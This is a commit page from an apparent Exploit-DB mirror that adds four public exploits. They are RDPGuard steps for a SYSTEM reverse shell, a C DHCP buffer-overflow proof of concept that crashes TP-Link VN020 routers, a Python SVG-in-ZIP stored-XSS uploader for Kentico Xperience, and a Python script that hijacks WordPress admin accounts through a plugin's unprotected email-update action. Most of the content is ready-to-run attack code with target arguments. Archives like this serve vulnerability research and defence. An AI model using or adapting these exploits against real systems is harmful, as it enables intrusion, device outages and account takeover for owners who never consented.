bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2025-05-14

Browse source 
5 changes to exploits/shellcodes/ghdb

RDPGuard 9.9.9 - Privilege Escalation

TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow

Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)

WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation
This commit is contained in:
Exploit-DB 2025-05-14 00:16:22 +00:00
parent 9044a602bb
commit e49e8d0522
5 changed files with 501 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

20
exploits/multiple/local/52289.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: RDPGuard 9.9.9 - Privilege Escalation
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 09.05.2025
# Vendor Homepage: https://rdpguard.com
# Software Link: https://rdpguard.com/download.aspx
# Tested Version: 9.9.9 (latest)
# Tested on: Windows 10 (32bit)
# # # Steps to Reproduce # # #
# 1. Prepare a .bat file containing your reverse shell code.
# 2. Open RDPGuard.
# 3. Navigate to Tools > Custom Actions / Notifications.
# 4. Click the "Add" button.
# 5. Leave "Event" as "IP Blocked".
# 6. Select "Execute Program" from the "Action" dropdown.
# 7. Under the "Program/script" field, select your prepared .bat file.
# 8. Set up your listener.
# 9. Click "Test Run".
# 10. A reverse shell as NT AUTHORITY\SYSTEM is obtained!

338
exploits/multiple/local/52292.c Normal file
View file

@ -0,0 +1,338 @@
/*
* Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow
* Date: 10/20/2024
* Exploit Author: Mohamed Maatallah
* Vendor Homepage: https://www.tp-link.com
* Version: TT_V6.2.1021 (VN020-F3v(T))
* Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
* CVE: CVE-2024-11237
* Category: Remote
* Technical Details:
* -----------------
* - Triggers multiple memory corruption vectors in DHCP parsing
* - Primary vector: Stack overflow via oversized hostname (127 bytes)
* - Secondary vector: Parser confusion via malformed length fields
* - Tertiary vector: Vendor specific option parsing edge case
*
* Attack Surface:
* --------------
* - DHCP service running on port 67
* - Processes broadcast DISCOVER packets
* - No authentication required
* - Affects all routers running VN020 F3v(t) specifically the ones
* supplied by Tunisie Telecom & Topnet
*
* Exploitation Method:
* ------------------
* 1. Sends crafted DHCP DISCOVER packet
* 2. Overflows hostname buffer (64 -> 127 bytes)
* 3. Corrupts length fields in DHCP options
* 4. Success = No response (service crash)
*
* Build:
* ------
* Windows: cl poc.c /o tplink_dhcp.exe or use visual studio directly.
*
* Usage:
* ------
* tplink_dhcp.exe
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <Ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
// Standard DHCP ports - Server listens on 67, clients send from 68
#define DHCP_SERVER_PORT 67
#define DHCP_CLIENT_PORT 68
#define MAX_PACKET_SIZE 1024 // Maximum size for DHCP packet
#define MAX_ATTEMPTS 3
// Forward declarations of functions
void create_dhcp_discover_packet(unsigned char* packet, int* packet_length);
void add_option(unsigned char* packet, int* offset, unsigned char option,
unsigned char length, unsigned char* data);
void tp_link(unsigned char* packet, int* offset);
void print_packet_hex(unsigned char* packet, int length);
int wait_for_response(SOCKET sock, int timeout);
int main() {
WSADATA wsa;
SOCKET sock;
struct sockaddr_in dest;
unsigned char packet[MAX_PACKET_SIZE]; // Buffer for DHCP packet
int packet_length = 0; // Length of constructed packet
int attempts = 0; // Counter for send attempts
int success = 0;
printf("[TP-Thumper] Initializing Winsock...\n");
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
printf("[TP-Thumper] Winsock initialization failed. Error: %d\n",
WSAGetLastError());
return 1;
}
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (sock == INVALID_SOCKET) {
printf("[TP-Thumper] Could not create socket. Error: %d\n",
WSAGetLastError());
WSACleanup();
return 1;
}
// Set up broadcast address (255.255.255.255)
dest.sin_family = AF_INET;
dest.sin_port = htons(DHCP_SERVER_PORT);
dest.sin_addr.s_addr = inet_addr("255.255.255.255");
// Enable broadcast mode on socket
BOOL broadcast = TRUE;
if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char*)&broadcast,
sizeof(broadcast)) < 0) {
printf("[TP-Thumper] Broadcast mode failed.\n");
closesocket(sock);
WSACleanup();
return 1;
}
srand((unsigned int)time(NULL));
// Create the DHCP DISCOVER packet
create_dhcp_discover_packet(packet, &packet_length);
// Main attempt loop - tries to send packet MAX_ATTEMPTS times
while (attempts < MAX_ATTEMPTS && !success) {
printf("[TP-Thumper] Sending DHCP Discover packet (Attempt %d/%d)...\n",
attempts + 1, MAX_ATTEMPTS);
print_packet_hex(packet, packet_length); //debug
// Send the packet
if (sendto(sock, (char*)packet, packet_length, 0, (struct sockaddr*)&dest,
sizeof(dest)) < 0) {
printf("[TP-Thumper] Packet send failed. Error: %d\n", WSAGetLastError());
}
else {
printf("[TP-Thumper] Packet sent. Waiting for router response...\n");
if (wait_for_response(sock, 10)) {
printf(
"[TP-Thumper] Router responded! Exploit may not have succeeded.\n");
success = 1;
}
else {
printf("[TP-Thumper] No response received within timeout.\n");
}
}
attempts++;
}
if (!success) {
printf(
"[TP-Thumper] Exploit succeeded: No router response after %d "
"attempts.\n",
MAX_ATTEMPTS);
}
else {
printf("[TP-Thumper] Exploit failed: Router responded within timeout.\n");
}
// Cleanup
closesocket(sock);
WSACleanup();
return 0;
}
/*
* DHCP Message Format:
* [0x00]: op = 0x01 ; BOOTREQUEST
* [0x01]: htype = 0x01 ; Ethernet
* [0x02]: hlen = 0x06 ; MAC addr len
* [0x03]: hops = 0x00 ; No relay
* [0x04-0x07]: xid ; Random transaction ID
* [0x08-0x0F]: secs + flags ; Broadcast flags set
* [0x10-0x1F]: ciaddr + yiaddr ; Empty
* [0x20-0x27]: siaddr + giaddr ; Empty
* [0x28-0x2D]: chaddr ; Crafted MAC
*/
void create_dhcp_discover_packet(unsigned char* packet, int* packet_length) {
memset(packet, 0, MAX_PACKET_SIZE);
int offset = 0;
// DHCP Header - Standard fields
packet[offset++] = 0x01; // BOOTREQUEST
packet[offset++] = 0x01; // Ethernet
packet[offset++] = 0x06; // MAC len
packet[offset++] = 0x00; // No hops
// ; XID - rand() used for bypass of response filtering
// ; mov eax, rand()
// ; mov [packet + 4], eax
unsigned int xid = (unsigned int)rand();
*((unsigned int*)&packet[offset]) = htonl(xid);
offset += 4;
// ; Flags - Set broadcast bit to force response
// ; mov word [packet + 8], 0x0000 ; secs elapsed
// ; mov word [packet + 10], 0x8000 ; broadcast flag
packet[offset++] = 0x00;
packet[offset++] = 0x00;
packet[offset++] = 0x80;
packet[offset++] = 0x00;
// Zero IP fields - forces DHCP server parse
memset(&packet[offset], 0, 16);
offset += 16;
// ; Crafted MAC - DE:AD:BE:EF:00:01
// ; Used for unique client tracking, bypasses MAC filters
packet[offset++] = 0xDE;
packet[offset++] = 0xAD;
packet[offset++] = 0xBE;
packet[offset++] = 0xEF;
packet[offset++] = 0x00;
packet[offset++] = 0x01;
memset(&packet[offset], 0x00, 10);
offset += 10;
// ; Skip server name/boot filename
// ; Total padding: 192 bytes
memset(&packet[offset], 0x00, 64);
offset += 64;
memset(&packet[offset], 0x00, 128);
offset += 128;
// ; DHCP Magic Cookie
// ; 0x63825363 = DHCP in natural order
packet[offset++] = 0x63;
packet[offset++] = 0x82;
packet[offset++] = 0x53;
packet[offset++] = 0x63;
// ; Stack layout after this point:
// ; [ebp+0] = DHCP header
// ; [ebp+240] = DHCP options start
// ; Router parses sequentially from this point
add_option(packet, &offset, 0x35, 0x01, (unsigned char[]) { 0x01 });
add_option(packet, &offset, 0x37, 4,
(unsigned char[]) {
0x01, 0x03, 0x06, 0x0F
});
// ; Trigger overflow conditions
tp_link(packet, &offset);
packet[offset++] = 0xFF; // End option
*packet_length = offset;
}
void tp_link(unsigned char* packet, int* offset) {
// ; Vendor specific overflow - triggers parser state confusion
// ; 0x00,0x14,0x22 = TP-Link vendor prefix
// ; Following 0xFF bytes cause length validation bypass
unsigned char vendor_specific[] = { 0x00, 0x14, 0x22, 0xFF, 0xFF, 0xFF };
add_option(packet, offset, 0x2B, sizeof(vendor_specific), vendor_specific);
// ; Stack buffer overflow via hostname
// ; Router allocates 64-byte buffer but we send 127
// ; Overwrites adjacent stack frame
unsigned char long_hostname[128];
memset(long_hostname, 'A', sizeof(long_hostname) - 1);
long_hostname[127] = '\0';
add_option(packet, offset, 0x0C, 127, long_hostname);
// ; Length field exploit
// ; Claims 255 bytes but only sends 1
// ; Router assumes full length during memory operations
// ; leads to read/write past buffer
add_option(packet, offset, 0x3D, 0xFF, (unsigned char[]) { 0x01 });
}
// ; Helper for DHCP option construction
// ; option = option code
// ; length = claimed length (can be falsified)
// ; data = actual payload
void add_option(unsigned char* packet, int* offset, unsigned char option,
unsigned char length, unsigned char* data) {
packet[(*offset)++] = option; // Option type
packet[(*offset)++] = length; // Claimed length
memcpy(&packet[*offset], data, length);
*offset += length;
}
// Debug
void print_packet_hex(unsigned char* packet, int length) {
printf("[TP-Thumper] Packet Hex Dump:\n");
// Print header fields with labels
printf("Opcode (op): %02X\n", packet[0]);
printf("Hardware Type (htype): %02X\n", packet[1]);
printf("Hardware Address Length (hlen): %02X\n", packet[2]);
printf("Hops: %02X\n", packet[3]);
// Transaction ID
printf("Transaction ID (xid): ");
for (int i = 4; i < 8; i++) {
printf("%02X ", packet[i]);
}
printf("\n");
// Flags
printf("Flags: ");
for (int i = 10; i < 12; i++) {
printf("%02X ", packet[i]);
}
printf("\n");
// Client Hardware Address (MAC)
printf("Client Hardware Address (chaddr): ");
for (int i = 28; i < 34; i++) {
printf("%02X ", packet[i]);
}
printf("\n");
// DHCP Magic Cookie
printf("Magic Cookie: ");
for (int i = 236; i < 240; i++) {
printf("%02X ", packet[i]);
}
printf("\n");
// DHCP Options
printf("DHCP Options:\n");
int i = 240;
while (i < length) {
printf(" Option: %02X, Length: %02X, Data: ", packet[i], packet[i + 1]);
int option_length = packet[i + 1];
for (int j = 0; j < option_length; j++) {
printf("%02X ", packet[i + 2 + j]);
}
printf("\n");
i += 2 + option_length;
if (packet[i] == 0xFF) {
printf(" End of Options\n");
break;
}
}
}
// Wait for router response with timeout
int wait_for_response(SOCKET sock, int timeout) {
struct timeval tv;
tv.tv_sec = timeout;
tv.tv_usec = 0;
// Set up file descriptor set for select()
fd_set readfds;
FD_ZERO(&readfds);
FD_SET(sock, &readfds);
// Wait for data or timeout
int result = select(0, &readfds, NULL, NULL, &tv);
return result > 0; // Returns true if data available
}

68
exploits/multiple/webapps/52290.py Executable file
View file

@ -0,0 +1,68 @@
# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
# Date: 2025-05-09
# Version: Kentico Xperience before 13.0.178
# Exploit Author: Alex Messham
# Contact: ramessham@gmail.com
# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/
# CVE: CVE-2025-32370
import requests
import subprocess
import os
import argparse
def create_svg_payload(svg_filename: str):
print(f"[*] Writing malicious SVG to: {svg_filename}")
svg_payload = '''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full"
xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
'''
with open(svg_filename, 'w') as f:
f.write(svg_payload)
def zip_payload(svg_filename: str, zip_filename: str):
print(f"[*] Creating zip archive: {zip_filename}")
subprocess.run(['zip', zip_filename, svg_filename], check=True)
def upload_zip(zip_filename: str, target_url: str):
full_url = f"{target_url}?Filename={zip_filename}&Complete=false"
headers = {
"Content-Type": "application/octet-stream"
}
print(f"[+] Uploading {zip_filename} to {full_url}")
with open(zip_filename, 'rb') as f:
response = requests.post(full_url, headers=headers, data=f,
verify=False)
if response.status_code == 200:
print("[+] Upload succeeded")
else:
print(f"[-] Upload failed with status code {response.status_code}")
print(response.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 -
Unauthenticated ZIP file upload with embedded SVG for XSS.")
parser.add_argument("--url", required=True, help="Target upload URL
(e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)")
parser.add_argument("--svg", default="poc.svc", help="SVG filename to
embed inside the zip")
parser.add_argument("--zip", default="exploit.zip", help="Name of the
output zip file")
args = parser.parse_args()
create_svg_payload(args.svg)
zip_payload(args.svg, args.zip)
upload_zip(args.zip, args.url)
```

71
exploits/multiple/webapps/52291.py Executable file
View file

@ -0,0 +1,71 @@
# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation
# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/
# Date: 2025-05-12
# Exploit Author: Md Shoriful Islam (RootHarpy)
# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/
# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip
# Version: <= 1.0.7
# Tested on: Ubuntu 22.04 + WordPress 6.5.2
# CVE : CVE-2025-3605
import requests
import argparse
import sys
def display_banner():
banner = """
_____ _____ ___ __ ___ ___ ____ __ __ ___
/ __\ \ / / __|_|_ ) \_ ) __|__|__ / / / / \| __|
| (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \
\___| \_/ |___| /___\__/___|___/ |___/\___/\__/|___/
"""
print(banner)
def suppress_ssl_warnings():
requests.packages.urllib3.disable_warnings()
def initialize_session():
new_session = requests.Session()
new_session.verify = False
new_session.headers.update({'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"})
return new_session
def parse_input_args():
parser = argparse.ArgumentParser(description="Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7")
parser.add_argument("--target", "-t", required=True, help="Target URL to exploit")
parser.add_argument("--target_user", "-u", default="1", help="User ID for target (default: 1)")
parser.add_argument("--new_email", "-e", default="example@gmail.com", help="Email to change to (default: example@gmail.com)")
return parser.parse_args()
def generate_payload(user, email):
return {
'action': 'flrblocksusersettingsupdatehandle',
'user_id': user,
'flr-blocks-email-update': email
}
def execute_exploit(session, target_url, payload):
try:
return session.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload)
except Exception as error:
print(f"Request error: {error}")
sys.exit(1)
def process_response(response):
if response.status_code == 200 and response.text.strip() != "0":
print(f"Exploit succeeded! Response: {response.text}")
print("Next: Go to the Forgot Password page and reset the admin password using the new email!")
else:
print(f"Exploit failed. HTTP Status: {response.status_code}, Response: {response.text}")
def run_exploit():
display_banner()
suppress_ssl_warnings()
args = parse_input_args()
session = initialize_session()
payload = generate_payload(args.target_user, args.new_email)
response = execute_exploit(session, args.target, payload)
process_response(response)
if __name__ == "__main__":
run_exploit()

4
files_exploits.csv
View file

@ -10568,6 +10568,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51983,exploits/multiple/local/51983.txt,"PrusaSlicer 2.6.1 - Arbitrary code execution",2024-04-12,"Kamil Breński",local,multiple,,2024-04-12,2024-04-12,0,,,,,,
43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2016-0772,,,,,https://github.com/tintinweb/pub/tree/11f6ebda59ad878377df78351f8ab580660d0024/pocs/cve-2016-0772
52190,exploits/multiple/local/52190.py,"qBittorrent 5.0.1 - MITM RCE",2025-04-11,"Jordan Sharp",local,multiple,,2025-04-11,2025-04-11,0,CVE-2024-51774,,,,,
52289,exploits/multiple/local/52289.txt,"RDPGuard 9.9.9 - Privilege Escalation",2025-05-13,"Ahmet Ümit BAYRAM",local,multiple,,2025-05-13,2025-05-13,0,CVE-n/a,,,,,
21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple,,2001-08-23,2012-09-05,1,CVE-2001-1003;OSVDB-11802,,,,,https://www.securityfocus.com/bid/3228/info
47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-5899,,,,,https://github.com/bcoles/local-exploits/blob/3c5cd80a7c59ccd29a2c2a1cdbf71e0de8e66c11/CVE-2017-5899/exploit.sh
49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,,2020-11-27,2020-11-27,0,,,,,,
@ -10585,6 +10586,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22732,exploits/multiple/local/22732.java,"Sun JRE/SDK 1.x - Untrusted Applet Java Security Model Violation",2003-06-05,"Marc Schoenefeld",local,multiple,,2003-06-05,2012-11-15,1,CVE-2003-1123;OSVDB-15151,,,,,https://www.securityfocus.com/bid/7824/info
9973,exploits/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Local Privilege Escalation",2009-10-17,prdelka,local,multiple,,2009-10-16,,1,CVE-2009-3692,,,,,
49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,,2020-12-09,2020-12-09,0,,,,,,
52292,exploits/multiple/local/52292.c,"TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow",2025-05-13,"Mohamed Maatallah",local,multiple,,2025-05-13,2025-05-13,0,CVE-2024-11237,,,,,
19551,exploits/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
11789,exploits/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,local,multiple,,2010-03-16,,1,OSVDB-63067,,,,,
@ -12090,6 +12092,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
24573,exploits/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting",2004-09-04,dr_insane,webapps,multiple,,2004-09-04,2013-03-04,1,,,,,,https://www.securityfocus.com/bid/11111/info
36609,exploits/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",webapps,multiple,80,2015-04-02,2015-04-02,0,CVE-2014-7910;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;CVE-2014-6271;CVE-2014-5288;CVE-2014-5287;CVE-2014-3671;OSVDB-120255;CVE-2014-3659;OSVDB-120254;OSVDB-120253;OSVDB-120252;OSVDB-120251;OSVDB-120250;OSVDB-120249;OSVDB-112004,,,,,
42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,,2017-05-30,2017-05-30,0,,,,,,
52290,exploits/multiple/webapps/52290.py,"Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)",2025-05-13,"Alex Messham",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-32370,,,,,
14629,exploits/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",webapps,multiple,80,2010-08-12,2010-09-08,0,OSVDB-67094,,,,,
44487,exploits/multiple/webapps/44487.txt,"Kodi 17.6 - Persistent Cross-Site Scripting",2018-04-18,"Manuel García Cárdenas",webapps,multiple,,2018-04-18,2018-04-18,0,CVE-2018-8831,"Cross-Site Scripting (XSS)",,,,
50521,exploits/multiple/webapps/50521.py,"KONGA 0.14.9 - Privilege Escalation",2021-11-15,"Fabricio Salomao",webapps,multiple,,2021-11-15,2021-11-15,0,,,,,http://www.exploit-db.comkonga-0.14.9.zip,
@ -12494,6 +12497,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011
52291,exploits/multiple/webapps/52291.py,"WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation",2025-05-13,"Md Shoriful Islam",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-3605,,,,,
49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - SQL Injection",2015-05-07,"Felipe Molina",webapps,multiple,,2015-05-07,2015-05-07,0,OSVDB-121843,"WordPress Plugin",,,http://www.exploit-db.comfreshmail-newsletter.1.5.8.zip,

Can't render this file because it is too large.